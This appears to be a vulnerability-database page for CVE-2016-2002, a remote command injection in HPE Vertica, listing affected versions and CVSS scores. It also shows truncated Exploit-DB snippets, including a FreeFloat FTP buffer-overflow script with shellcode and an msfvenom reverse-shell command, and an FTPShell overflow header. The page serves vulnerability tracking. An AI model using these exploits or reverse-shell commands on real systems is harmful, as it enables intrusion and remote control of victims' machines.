CVE-2016-2002
published 2016-04-20CVE-2016-2002: The validateAdminConfig handler in the Analytics Management Console in HPE Vertica 7.0.x before 7.0.2.12, 7.1.x before 7.1.2-12, and 7.2.x before 7.2.2-1…
PriorityP259critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
3.09%
86.1th percentile
The validateAdminConfig handler in the Analytics Management Console in HPE Vertica 7.0.x before 7.0.2.12, 7.1.x before 7.1.2-12, and 7.2.x before 7.2.2-1 allows remote attackers to execute arbitrary commands via the mcPort parameter, aka ZDI-CAN-3417.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opentext | vertica | >= 7.0.0 < 7.0.2.12 | 7.0.2.12 |
| opentext | vertica | >= 7.1.0 < 7.1.2-12 | 7.1.2-12 |
| opentext | vertica | >= 7.2.0 < 7.2.2-1 | 7.2.2-1 |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
exploitdb·2016-11-01
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow
---
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF ABOR Command
# Date: 29/10/2016
# Exploit Author: Ger
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 2002 Service Pack 3
# CVE : n/a
import socket
#shellcode with metasploit
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
#nc -lvp 443
#send the exploit
ret='\x73\x18\x6E\x74' #MSCTF.dll
shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1"
"\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe"
"\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28"
"\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x
Exploit-DB
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
exploitdb·2016-02-04
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
---
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#
Exploit-DB
User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
exploitdb·2000-08-25
CVE-2002-2016 User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation
---
source: https://www.securityfocus.com/bid/3973/info
User-Mode Linux (UML) is a patch which allows the Linux Kernel to run as a user space process. It is currently available for the Linux operating system. It may be used as an efficient tool for kernel development, as well as for virtual networking, honeypots, and experimentation.
UML does not correctly protect kernel address space from user programs within the UML environment. It may be possible to execute arbitrary code within the kernel and gain root access. Additionally, it may be possible to use this vulnerability to escape the UML environment, leading to local access on the hosting system.
This is a known problem with the current UML implementation.
2016-04-20
Published